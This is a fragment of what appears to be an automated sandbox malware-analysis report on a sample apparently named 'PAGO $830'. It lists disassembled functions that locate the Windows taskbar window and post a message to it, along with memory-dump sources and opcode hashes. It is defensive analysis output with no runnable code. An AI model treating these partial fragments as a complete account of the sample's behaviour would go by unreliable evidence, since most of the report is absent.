                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: FindMessagePostSleepWindow
                                                          • String ID: Shell_TrayWnd
                                                          • API String ID: 529655941-2988720461
                                                          • Opcode ID: bb7fe3e7aa73039629a84fc05bbd1aaff8cb9c16e1c939afc082e1ba6500c814
                                                          • Instruction ID: 6c9fe3a64aa3434007fe439d839594679fa4d0bbcc8a7a6ea1592c0c2615fb95
                                                          • Opcode Fuzzy Hash: bb7fe3e7aa73039629a84fc05bbd1aaff8cb9c16e1c939afc082e1ba6500c814
                                                          • Instruction Fuzzy Hash: F9D0A9313803007AE224B370AC0FFCA6A089B00B00F104A027209BA2C0C8A1A8408724
                                                          Function 00E02255 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00E0225F
                                                          • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00E02272
                                                            • Part of subcall function 00DDE899: Sleep.KERNEL32 ref: 00DDE911
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: FindMessagePostSleepWindow
                                                          • String ID: Shell_TrayWnd
                                                          • API String ID: 529655941-2988720461
                                                          • Opcode ID: 994c1c98430a7d6db6b5e9ce65745bba1bc88efc89a8fcf515a50617f47cc864
                                                          • Instruction ID: cbc5608665057ee5a3698113f25d9047bcb9e3c2b58aa6586a4e246cf3fe63e5
                                                          • Opcode Fuzzy Hash: 994c1c98430a7d6db6b5e9ce65745bba1bc88efc89a8fcf515a50617f47cc864
                                                          • Instruction Fuzzy Hash: 76D0C975794310BAE264B771AC0FFCA6A189B40B10F114A167649BA2D4C9A5A8448764